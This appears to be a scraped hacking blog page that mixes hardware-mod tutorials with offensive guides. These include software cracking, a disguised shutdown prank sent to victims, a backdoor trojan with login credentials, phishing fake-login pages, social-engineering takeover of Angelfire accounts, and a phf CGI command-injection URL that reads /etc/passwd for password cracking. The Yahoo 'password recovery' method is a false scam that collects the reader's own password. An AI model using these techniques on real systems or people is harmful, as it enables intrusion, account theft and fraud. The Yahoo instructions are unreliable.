Related Articles by Labels



Widget by Hoctro
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Full Hack Pack

Full hack pack for everything you need Rapidshare , Hack msn , Windows Hacks , Paypal, Ebay, E-mail, Servers, Passwords Pass, Remote shutdown , Ultra Dos, Bios pass remover, Etc…

Download:
http://rapidshare.com/files/102902635/Full.Hack.Pack_By_MechoDownload.rar
Password:
mechodownload

Cheat in online flash games

To cut the small talk, i will write this tutorial in small steps:

1. Download a Mozilla Firefox addon called Tamper Data

2. Find a game you want with ability to submit your score.

3. Before you start the game, start the Temper Data addon by going on Tools -> Tamper Data -> Start Tamper

4. Now, start the game, get some score, and then, lets say, lose. Now select to submit the score. Then Temper Data should appear, and select button Tamper, and in the right part of the window you should find a string of commands that game has set to browser. You should find the word SCORE and the number that should be next to it. Change that number as you wish. Then click submit in the Tamper Data and you should get the score you wanted.

Crack any software - create your own crack

Who has never wanted to learn how to unlock shareware programs without knowing exactly where to begin? Contrary to what might think, to unlock a program is not very precise knowledge. But the road is long and calm must prevail in the most unexpected moments. In face, a little knowledge of Assembler also help. The rest, is learning from practice.

Beginning of the START

If you want to learn how to unlock a program, we must learn to use the famous debuggers to analyse and unlock the codes of programmes. Of all out there, Hackman is the best because it is free, extremely efficient and has a rather suggestive name ... Programs such serve to monitor the operation of programs, check some potential bugs and also to hack software. Download Hackman at the Downloads of the page, install it and also download the program COBAIA.ZIP and extract it. He is a software test for you to experience the pleasure of breaking the limitation of an application.

REGISTER A SOFTWARE

The inner workings of a programme to register the software is basically the following procedure:

1.0 - EXHIBITION OF THE SCREEN RECORD.
2.0 - AGUARDA THE ENTRY OF SERIAL NUMBER.
3.0 - compare the number of DIGITED SERIES WITH SERIAL NUMBER OF PROGRAM.
3.1 - IF THE FIGURES ARE EQUAL PROSSEGUE SO THE IMPLEMENTATION OF THE PROGRAMME.
3.2 - IF NOT SO ARE EQUAL ABORTA THE PROGRAMME AND SHOW The MENSAGE: "Wrong Serial"!


As we can see, the sequence of cases is relatively simple and has not changed much since the primórdio of time. Hence, we should bear in mind two things: 1) There will always be a place within the program where the password is stored, so be it explicit or implicit (encrypted), 2) There will always be within the program a COMPARISON between the code entered in Upon registration of the software with the original record of the program written in it.
Hence, there is not much secret to desvendarmos. Indeed, we need patience and cunning to run this program that both want and for which we do not have any crack, without having to spend a dollar of the original. Instead of waiting for someone to get the crack, we ourselves try to do so - although this is subject to another Hacker Space ...

In this issue we will do small exercises for the location of passwords within the programmes and also to the change of wording in the programmes most common (in part to serve for the translation of games and programs).

The COBAIA

To start the game, turn the program COBAIA.EXE in your microwave. This program is nothing more than an example of simple application for registration. In a common situation, entering with the serial number indicated on the field and press the record button. Ready! From that moment, you become the latest user of the software in question. But as we do not know the password of the programme and not buy an original, all that remains to do is try to find some way of driblar, mislead or deceive the computer. Close the program, but still naum chore because not begin to enjoy some of hacker.

Start with the HACKMAN

Certainly the best friend in a contract of this size is a debugger or desassembler. These programs serve to analyse, test or simulate the operation of the programme together with the monitoring of the processor registers and other peripherals espetados in your microwave. This facilitates the test and location of errors in programs. Soon to open Hackman on your computer, you will see a screen similar to the FIGURE 1.


At that point the program still naum has no other open source software within its system and is waiting to open the program-victim.

THE SEARCH FOR SERIAL NUMBER

From the menu bar of the HACKMAN, select FILE> OPEN> OPEN FILE COBAIA.EXE and open the program in its directory. Shortly after opening the program, the HACKMAN shows a screen similar to the FIGURE 2.



On this screen to the left, the codes are shown in the programme HEXADECIMAL debugado. To the right are the equivalents in ASCII code.
Be very carefully, because this first screen we can find clues of the code of destravamento. See that in the field of ASCII codes can identify a sentence in the midst of several blank spaces and other characters senseless.

The sentence in question is: "This program must be run under Win32."

To find this sentence, we can see how the structure of messages from the system. Note that the routine is used to print the character 0Dh to demarcate the end of a string. Now watching the screen and implementation of COBAIA.EXE can isolate some of the messages that the program displays and thus find parts of the code can be stored where the serial number of software.
List of screen record the words FIGURE 3.



appearing in the main bar of the program and "Geek Soft Corporation" to find them in the program. But why select precisely these words? Because within a programme, independent software development which has generated its code, usually all variables are allocated in the same region of code.

Assuming that the serial number is stored inside a variable within this region, costs nothing to give a bisbilhotada where these names appear to see if something naum next of these variables that may be sought as our code. In the menu of HACKMAN select EDIT> FIND and will appear in the Search box. But before entering the phrase for search, make sure you have selected the search in ASCII seek to prevent and find erroneous data. Make the search for the words above and see the result in FIGURE 4.


Try to play with data you found editing the fields. After you change the values of some variables, save the program using FILE> SAVE AS. Try again run the program. Trocamos the "Geek" from the phrase "GEEK SOFT Corporation" by the word "Hack" FIGURE 5



In theory, with that scheme, you can replace any word that appears within a program.
It is ridiculous, but this is a program hackeado. The problem is that naum there is some utility for what we have done. Change characters of a program is something simple to do. Hence, we will continue our search by serial number.

When the program is to register and enter numbers wrong, we received when the phrase "Senha_Errada" as a sign that naum had success in the attempt. According to the reasoning of checking numbers of series, we can say that the original code must be close to this routine. Hence, we seek a FIND and the phrase "Senha_Errada" in the program. To find the words, we see her next two words: Congratulations and GEEK13.

Analyzing the executable, it probably comes from a code that follows the logic below:

Code: if Field = 'GEEK13' then
/ / IF the variable Field is equal to GEEK13 SO
Status = 'Congratulations'
/ / The variable Status equals Congratulations
else / / SENÃO
Status: = 'Wrong Serial';
/ / The variable status is equal to Senha_Errada

Since we have two results (GEEK13 and Congratulations), we can by trial and error to know the correct password. Going beyond the programming and using common sense, One would imagine that "Congratulations" is the message displayed when you entered the correct password. Of course, this procedure is visible here and to Carla Perez would be able to unlock a program like this.

Hacking commercial software is a much greater challenge that we proposed. However, the commencement of any crackeamento is done using tools such as Hackman and other utilities Freeware, coupled with much training. What we did was state the path of stones. Venture to own account in the world hexadecimal codes and encrypted messages.

Shutdown a Computer via MSN

Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.

1) Right click on desk top, and then go New, then Shortcut.

2) Then in the "type location of the item" you want to type:
%windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"


You can change "this is a virus" to anything you would like that’s just the message that will appear.
The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown.
Once the code has been entered as you have seen above click next.

My advice would be to rename it something like.... wicked game, hardcore porn. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it.
After you have given it a name click on finish.
You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it.
It is also advised you change the icon to something different.

3) Change name and icon.

4) Now to send it to some one you need to make a compressed file.
This can be done by right clicking on the desktop, New, Compressed file (zipped)
Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.

5) Once your shutdown virus is in your compressed folder rename it.
Make sure to give it a similar name as to the file inside it like "Great Game.zip"
Don’t forget to add the .zip at the end.
WARING! Make sure when you rename the compressed folder to add .zip at the end it is very important.

Now feel free to send it to anyone.

As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL
Ok go to start, run, type cmd, then in cmd type: shutdown -a
That’s about it have fun guys.

Mod your keyboard

Disclaimer: This tutorial is presented for moding your keyboard and is adviced to perform this tut only if you are interested and wants to take the risk ! This is for the illustration purposes only. I (Tech&ME) can not be held responsible for damages resulting from anything that you may decide to do to your hardware. I also can not and will not be held responsible for injury to your self or others as a result of attempting to mod your keyboard or for others. (You can try this with your old hardware first)

So you still have those ugly green LED’s on that keyboard of yours? In this tut, I’ll show you how to hook up some new good looking LED’s to that keyboard to give your desktop a new look!

This is a very simple, yet very attractive mod which will cost you very very less.

Parts Required:



3 X - 3mm/5mm LED’s (Blue, Red, Green, UV)
Soldering Iron
Solder
Screwdriver

(some keyboard have more than 3 led's so purchase according to your requirements)



Step 1: Flip the keyboard over and locate the screws. My keyboard had 10 screws, all in visible areas so locating the screws was not a problem. Take your screwdriver and start unscrewing all the screws one by one. Remember to keep all the screws in a safe place, and to separate the different sizes so that putting it back together won’t be a problem.

In the meanwhile plug in your soldering iron, and let it heat up.

Step 2: Once all the screws have been removed, take off the back plate and locate the PCB on the top left corner of the keyboard.
There will be a screw or two holding it down. Unscrew those screws and lift the PCB to reveal the LED’s and other components.



The LED’s will be mounted there. (remember not to touch the circuits and other parts of the PCB with your hands!)

Step 3: This is where your soldering iron and your soldering skills are put to the test (sort of!).



Turn over the PCB and de-solder the first LED. Make sure you do not place the iron on the PCB for long periods of time or else, the soldering iron will burn right through it!

Step 4 : Once that is done put in your LED’s.



Remember to put the long lead of the LED through the hole with the + sign! Do the same with the remaining LED’s.

Step 5: Screw the PCB back in place. Adjust the electronic pad (the rubber sheet & the drawn circuit sheet), so that it is aligned properly with respect to every key and also the PCB – Very Important step.

Step 6: Screw the back plate in place and connect your keyboard to PC and in on.



And that's when you start getting a new look from your desktop!

I hope you enjoyed this tutorial. And if you have done the moding or not please comment !

Your suggestions and comments are important to me so please post them here!

I do not take the full credit for this tuturial since many other people were also involved.

Get full control of others pc

Follow the link below and download a program to hack others pc.

Click here to download

How it works :-

»kills firewall to insure good ftpying
»starts on startup and is hidden from user
»lowers windows security and stops all updates.
»the error msg shown is removed

How to use :-

»send this file to victim.
»after victim runs the file goto run>cmd>
»type telnet
where is the static ip of the host!!
»now it would prompt you to enter username and password
username:gengis
password:lahire
hit enter
»congrats you have entered into victim's pc!!
use basic dos commands to traverse within and run programs on his pc!!


compatible with :-

»all windows version except vista - vista doesn't support telnet
»all unix pcs!!


If you find that link is broken or if you are not able to download the file then please leave a comment here and i will try to solve the problem as soon as possible.

Transform a CD-ROM Drive into a Car CD Player!

How To Make The Adaptation

To be used as CD player, the CD-ROM drive doesn't need to be connected to the computer. This way, it is possible to easily transform a CD-ROM drive into a Car CD player. Sounds crazy? Not so. With this tutorial you will be able to have a CD player in your car without spending almost anything.

The CD-ROM drive to be use may be of any type, from the first models ("1x") until the most modern ones ("60x"). The only prerequisite is that the drive needs to have is an earphone plug and volume control. And practically all CD-ROM drives have that.

There are two great advantages in transforming a CD-ROM drive into a Car CD player. First, who will want to break your car window to take CD-ROM drive? And, secondly, since any type of CD-ROM drive can be used, you may take an old drive that is just dusting away in your house (for instance, a 2x drive from an old 386 computer), which brings the cost down to almost nothing.

To install a CD-ROM drive in the car, you will need a female power plug, to be used to fit into CD-ROM drive power plug (that plug can be cut from an old power supply) and a voltage regulating integrated circuit called 7805, that may be easily found at electronic parts stores. You will also have to buy a heat dissipator for the 7805 (sold at the same store).

The car battery is a 12 V one, but the CD-ROM drive needs two voltages to work: 12 V and 5 V. The 7805 circuit is able to convert a 12 V voltage into 5 V (its pin 1 is for the input, its pin 2 is the grounding, and its pin 3 is the 5 V exit). Figure 1 shows the plan for the connection. The grounding pin should be connected to the wires of the plug grounding and the negative pole of the car battery, what is done by simply connecting that pin to the metallic body of the car.

Figure 1: CD-ROM adaptor schematics.

All you have to do is to make the connections shown in the above schematics (don't forget to isolate all connections with insulating tape) and you are set: you will have a CD-ROM drive working as CD player in your car.
The audio output will be made using the earphone plug. To listen to a CD, you will have to use earphones. To have the sound come through the speakers of the car, you will have to buy an amplifier with RCA inputs and a stereo P2 (mini jack) x stereo RCA cable (the same type of cable used to connect Discman units to amplifiers). The stereo P2 plug (also known as mini jack), which is the one used for the earphones, should be fit at the earphone output of the CD-ROM drive, while the RCA plugs should be fit at the input of the amplifier. The volume control will be made using the volume control in the CD-ROM drive.
A last warning: in most CD-ROM drives, the reproduction button (play) and the advance button (skip) are on the same key. In other words, to skip a track, all you have to do is to press the play button.

Frequently Asked Questions

Can the CD-ROM drive in use as a car CD player reproduce MP3 files?
No. If not connected to a computer, the CD-ROM drive will only work to play audio CDs. Music CDs in the MP3 format are recorded in the CD-ROM format. To read it, the unit forcibly needs to be connected to a computer. MP3 songs are not played by the CD-ROM drive, but rather by the sound card of the computer, and the machine processor is responsible for transforming the MP3 format into an audio format. Car CD players that play MP3 have a dedicated processor capable of reading the CD-ROM format and of converting MP3 files into audio ones. Since the common CD-ROM drive doesn't have such processor, it can not play MP3 files.
Can the same adaptation be made so CDs may be played in a domestic sound system?
Yes. To do so, the sound system must have an auxiliary input channel. However, to prevent the sound from getting distorted, you will have to use the audio output at the back of the CD-ROM drive and nor the earphone output, as mentioned last week. To do this, you will have to take the audio output cable from the CD-ROM drive and solder two RCA plugs - a black or white one (left channel) and a red or yellow one (right channel) – at the end that should be connected to the sound card of the computer. If you don't know how to do that, contact an electronics technician. To feed the CD-ROM drive you may use a power source from an old PC. One important detail: AT power sources have an on-off switch, but the ATX ones don't. If you will use an ATX power source, you will have to make a pin-14 connection (green wire), from the main plug of the source to any black wire to turn it on.
Won't the CD oscillate too much?
That will depend on the unit used (its manufacturer and model). Of course you cannot expect a CD-ROM drive to have the same stability of a car CD player. Remember that our tip is to assemble a car CD player spending nothing (or almost nothing). If you used our tip it is because you are possibly not willing to buy a car CD player.
Why should the connection between the CD-ROM unit and the amplifier be made using the ear phone output and not the one at the back of the unit?
That is because car amplifiers don't usually have volume control. If you use the output at the back of the CD-ROM drive – which doesn't have volume control either – the sound from the amplifier will always be at its loudest. We believe that this is not convenient. If you should use the output at the back of the CD-ROM drive only if you are to connect it to a pre-amplifier, equalizer, mixer, or home sound system, since they have volume control.

Source: http://www.hardwaresecrets.com/article/71

iPod hack - LinuxPod

The current most popular hack is installing Linux on your iPod. Why would you want to run Linux on your iPod? Because you can use your iPod for a variety of other functions otherwise not possible with the regular OS. The install program PODZILLA is a barebones flavour of Linux with a GUI that runs on the iPod's tiny screen.

With Podzilla running on the iPod, one can get the age-old PC game DOOM to run on the iPod.

Fake login page

Now you can create your own fake login page to hack into others account.
Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you.

Just take a look at a fake login page which i created.
click here to view the fake login page

Now lets learn how to create your very own fake login page.

{1} Open www.jotform.com and Sign Up.
{2} Then Login there with your newly registered account.
{3} Now click on ' Create your first form'.
{4} Now delete all the pre-defined entries, just leave 'First Name:'. (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on 'First Name:' (Exactly on First Name). Now the option to Edit the First Name is activated, type there "username:" (for gmail) or YahooId: (for Yahoo)
{6} Now Click on 'Power Tool' Option (In right hand side...)
{7} Double click on 'PasswordBox'. Now Click the newly form password entry to edit it. Rename it as 'Password:'
{8} Now Click on 'Properties' Option (In right hand side...). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in ThankYou URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don't leave it blank...)
{11} Now Click on 'Save'. After saving, click on 'Source' Option.
{12} Now you can see two Options, namely 'Option1' & 'Option2'. Copy the full code of 'Option2'.
{13} Now open Notepad text editor and write the following code their.



Paste the Option2 code here


{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.

Hack angelfire account

Ok...lets start!



Now hacking angelfire pages is not that big of a deal...there are other ways to
hack angelfire pages but i have tested them and they dont work. BUT my way is
easy,fast and NEW...



One day i was wondering around angelfire pages, trying to find a way to hack
them i knew the email trick was lame and angelfire never reply's so i started
thinking...i made a fake account at angelfire and started exploring...after
about 4hrs i saw it!!.



If you view the source on bedit.html (the page right after you log in) you can
see that your password is there its not hidden or anything is just there!! this
is where its located...its about 17,18 lines down from <html> at the top.



<font color=teal>Your page <a href="http://www.angelfire.com/mi/KrazieBread/index.html">
http://www.angelfire.com/mi/KrazieBread/index.html </a> has been saved.<br>You
may have to click Reload or Super-Reload (Shift+Reload) to see your edited page
and not your old version when you go to your URL.<br>You can also announce your
new page on <a href="http://homepages.whowhere.com/bin/showpage.pl?add">WhoWhere?</a>,
<a href="http://newtoo.manifest.com/"><u>What's New Too!</u></a>, or if you
really want to get noticed, go to <a href="http://www.submit-it.com/"><u>Submit
It!</u></a><br>Tune up your Web Site at the <a href="http://www.angelfire.com/cgi-bin/ct?ad=websitegarage&vp=/index.clicked&ru=http://www.websitegarage.com/whowhere">Web


Site Garage</a>.</font>

</td></tr></table></center>

<form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">

<input type="hidden" name="storage" value="mi">

<input type="hidden" name="hpd" value="KrazieBread"> --------

<input type="hidden" name="password" value="KRAZIEb"> <-----!ITS HERE!.

--------

The bold text is the password.



You probably saying "SO WHAT?? WHAT'S THE BIG DEAL??"



The big deal is that A LOT i mean A L O T of people don't know there password is
there and you can just get in there page.



I have kept this a secret for a long time but i think its time for me to tell
you guys how to do it...it has worked for me about 90% of the time and many
angelfire pages have been hacked MY WAY, not the lame email way or the cgi way
that DON'T EVEN WORK!





WARNING!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!



++!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

YOU NEED A EMAIL ACCOUNT BEFORE YOU START THIS...GO TO WWW.HOTMAIL.COM AND MAKE

ONE DON'T GIVE REAL INFO JUST LIE ABOUT EVERYTHING BUT REMEMBER YOUR LOGIN AND
PASSWORD

BECAUSE YOU'LL NEED THIS LATER ON!! now follow the steps :)

++!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

WARNING!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!



=\\**** 1st step ****//=<==



Find a lamer you wanna test this on or if you know someone you wanna fuck up
just use him...(the best way of getting this done right is to be nice to the
lame victim so he don't think your trying anything on him) anyhow...get the
lamer and tell him that you know a nice trick that well let him know who enters
his page and when they enter it with there ip internet username and password and
that all this well be emailed to him.



And ask him if he wants to give it a try...if the person doesn't really fall for
it then just tell him its a very good way to get back people you hate, and all
he has to do is tell the lamer to go to his page and the persons info well be
emailed tohim. (that might just make him think again about it)



=\\**** 2nd step ****//=<==



After the poor victim says ok ask him to follow these steps...

1st- tell him to log on to his page (angelfire account).



2nd- after he is in tell him to save the page (PAGE SHOULD BE BEDIT.HTML)
somewhere he can find later on (SAVING AS IN =SAVE AS= ON YOUR BROWSER MENU) and
tell them to tell you when he is done...



=\\**** 3rd step ****//=<==



After he has done all this tell him you have to scan the file (BEDIT.HTML) with
a program you have, to make sure his page is not infected with the YELLOW virus
because if it is then the trick well not work...ask him to send you the
BEDIT.HTML file and that it wont take more then 3mins. If they say send me the
program i wanna do it my self say you cant its on a cd and its protected so it
cant get send around and USE YOUR IMAGINATION AGAIN ! until you get him to send
you the BEDIT.HTML file.



=\\**** 4th step****//=<==



fast right when you get the file click on it, and BANG your in his account :)
now remember the email id you made before...well RIGHT AWAY change the victims
email, go to *change email* and type in yours...now angelfire will send you an
email and in it it has your new giving password and your new email so the POOR
LAME

VICTIM cant email them saying he lost his password or anything because angelfire
thinks he changed his email and they just think the poor victim is lying so they
wont reply :)...now that you have changed his email the page is yours just log
in angelfire with the new password giving to you and that's all.



 

Hacking webpages part1

There is many different methods of hacking users web pages on a server. I
will attempt to list as many ways possible but don't expect very much in depth
information.



Getting Passwords



Okay suppose you found a page you want to hack, that is on someone else's server
that's a basic server, light security. Okay very light security. I will be
truthful. This pretty much works on servers with no security.

Getting a password file is pretty easy. Simply telnet into the servers FTP
anonymously and look in the ETC directory and get the file called Passwd.
Another way to get them is to find your target and in

a WWW browser type cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd after


the servers name. For example the name may be http://www.hackme.com/, you
would goto                     
http://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
except instead of www.hackme.com you would replace that with your targets URL.
You may get a passwd file that has no user accounds, but only defaults which
where the encrypted password should be a * would be in its place. On certain
servers with this you may have a shadowed passwd but on all passwd files i have
come across there is some user names like FTP and NEWS that have no encrypted
passwords which is replaced with *. If you find only this and no encrypted
passwds you probably have found a fixed passwd file and you must try another
method of hacking the server. You need to examine this file and look for a line
in the text that looks like this:

rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/kshdoes not
need to look exactly like that, the only important part it needs it the
uXDg04UkZgWOQ and rcc, which is the login part. Get a program called John the
Ripper which can be found on any hacking site on the web. If you are to lazy, or
stupid to find one on the web here is a good place to go for newbies
http://www.hackersclub.com/km/ I
will not go in depth right here on passwd files, but i have written a text on
passwd's going good into the subject which can be found at

http://www.xtalwind.net/~lmclaulin/ugpasswd.txt
. Anyway, using John the
Ripper is easy, if you want to quickly hack something give the command (in DOS
prompt) "john passwd -single" Replace "passwd" in there with the name of the
passwd file, you may have saved it as passwd.txt or something. An important
thing to remember is that the passwd file needs to be in the same directory as
John. To see a list of other methods for

cracking a passwd file, just type John and it will give you a list of commands.
I have found john won't work for me with wordlists but other people say that it
works fine for them. You can use incremental mode (to use that the command is
"John passwd -incremental" It takes like a few days to finish so I wouldn't
really want it to let it go on forever and ever if it was just some normal
passwd file. Unless its like NASA's passwd file (keep dreaming, they probably
change passwords everyday and that file is very outdated) I wouldn't want to use
that too much. To see a complete list of John's cracking capabilities, just type
john and it will give you a list of commands that you may use.



 


In my next post you will find a tutorial on "How to hack website if you
Have an Account with the Users Server
"

Hack yahoo email-id using yahoo only

Need to hack yahoo passwords?

It is possible and it is easy. This way of hacking into Yahoo email accounts was
brought to my attention by a friend. I have tried the method a least a dozen
times and it has worked on all but 2 occasions, I don't know the reason

why it failed a couple of times, but on every other occasion it has got me the
password for the requested email address. This is how it is done:

STEP 1- Log in to your own yahoo account. Note: Your

account must be at least 30 days old for this to work.


STEP 2- Once you have logged into your own account,

compose/write an e-mail to: cgibin.pass_getback14290 @yahoo.com This is a
mailing address to the Yahoo Staff. The automated server will send you the
password that you have 'forgotten', after receiving the information you send

them.


STEP 3- In the subject line type exactly: " PASSWORD

RECOVERY "


STEP 4- On the first line of your mail write the email

address of the person you are hacking.


STEP 5- On the second line type in the e-mail address

you are using.


STEP 6- On the third line type in the password to YOUR

email address (your OWN password). The computer needs your password so it can
send a JavaScript from your account in the Yahoo Server to extract the other
email addresses password. In other word the system automatically checks your
password to confirm the integrity of your status. The process will be done
automatically by the user administration server.


STEP 7- The final step before

sending the mail is, type on the fourth line the following code exactly:

cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa

script< ip://233.243.2.34/cgi-bin/start?

v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>


{simply copy and paste above.}